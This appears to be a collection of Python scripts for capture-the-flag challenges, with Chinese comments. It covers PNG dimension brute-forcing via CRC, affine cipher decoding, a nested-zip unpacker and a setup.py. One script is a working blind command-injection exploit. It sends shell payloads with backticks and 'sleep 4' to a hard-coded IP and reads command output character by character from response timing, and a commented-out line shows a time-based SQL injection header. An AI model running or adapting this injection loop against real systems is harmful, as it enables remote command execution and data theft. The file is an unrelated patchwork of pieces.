import os
import binascii
import struct

crcbp = open("00000000.png", "rb").read()    #打开图片
for i in range(2000):
    for j in range(2000):
        data = crcbp[12:16] + \
            struct.pack('>i', i)+struct.pack('>i', j)+crcbp[24:29]
        crc32 = binascii.crc32(data) & 0xffffffff
        if(crc32 == 0x59f1d4be):    #图片当前CRC 需要在前面加0x
            print(i, j)
            print('hex:', hex(i), hex(j))



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author： moddemod
# datetime： 2019/12/27 下午9:50
# ide： PyCharm

# y = 17x-8 flag{szzyfimhyzd}

import gmpy2
s = 'szzyfimhyzd'
r = gmpy2.invert(17, 26)

s1 = ''
for i in s:
    s1 += chr(r * (ord(i) - ord('a') + 8) % 26 + ord('a'))
print('flag{' + s1 + '}')




__all__ = ['affine_Crypto','base64_ascii','blindSQLIN','crack_Matryoshka_zip','eighthex_string','eight_thex_Hexstring','grep_Php_code','p_S','number_To_ascii','png_Realsize','offset']
from zero.first import *


import requests

url = 'http://123.206.31.85:49165/index.php'
s = requests.session()
allString = '''1234567890~`!@#$%^&*()-_=+[]{};:'"|\,<.>/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'''

database = ''
flag = 1
comm = input('输入指令：')
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0',
           'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
           'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
           'Referer': 'http://123.206.31.85:49165/index.php',
           }
cookies = dict(PHPSESSID='r8l8lt19lut1mq3gu7sogcq0q7')
for i in range(0, 100):  # 根据自身需要改长度，如果空格连续出现四次以上，就说明后续没内容了
    for j in allString:
        # header = {
        # "X-Forwarded-For":"1'+(select case when (ascii(substr(database() from %d for 1))=%d) then sleep(3) else 0 end))#"%(i,ord(j))
        # }
        # print(j)
        if j == "^":
            # print('此处有空格')
            j = " "
            data = {'c': "123;a=`" + comm + "`;b=' ';if [ ${a:" + str(i) + ":1} == $b ];then sleep 4;fi"}
        else:
            data = {'c': "123;a=`" + comm + "`;b=\'" + str(j) + "\';if [ ${a:" + str(i) + ":1} == $b ];then sleep 4;fi"}
        r = requests.post(url, data=data, headers=headers, cookies=cookies)
        t = r.elapsed.total_seconds()
        # print(r.text)
        print(database + '     ' + 'the time of ' + j + ' is ' + str(t))
        if t >= 4:
            database = database + j
            print('the ' + str(i) + ' place of database is ' + j)
            break
        elif t < 4 and j == 'M':
            flag = 0
            break
    if flag == 0:
        break
print('', database)


import zipfile
import re
zipname = "C:\\Users\\11502\\Desktop\\"+"11549.zip"
while True:
    if zipname != "C:\\Users\\11502\\Desktop\\Cattle.jpg":
        ts1 = zipfile.ZipFile(zipname)
        #print ts1.namelist()[0]
        res = re.search('[0-9]*',ts1.namelist()[0])
        print (res.group())
        passwd = res.group()
        ts1.extractall("C:\\Users\\11502\\Desktop\\",pwd=passwd)
        zipname = "C:\\Users\\11502\\Desktop"+ts1.namelist()[0]
    else:
        print ("find")




#!/usr/bin/env python
from distutils.core import setup
# 通过 setuptools 模块导入所需要的函数
from setuptools import setup,find_packages
setup(
    description="lcx",
    name="lcxscenario",
    version="0.0.2",
    author="lcx",
    #url="", 此网站需要存在且未被占用
    packages = find_packages("zero"), # 模块的保存目录
    package_dir = {"":"zero"}, # 告诉 setuptools 包都在 ckh 下
    package_data = {
        # 定义打包除了 .py 之外的文件类型，此处 .py 其实可以不写
        "":[".txt",".info","*.properties",".py"],
        # 包含 data 文件夹下所有的 *.dat 文件
        "":["data/*.*"],
    },
    # 取消所有测试包
    exclude = ["*.test","*.test.*","test.*","test"]


)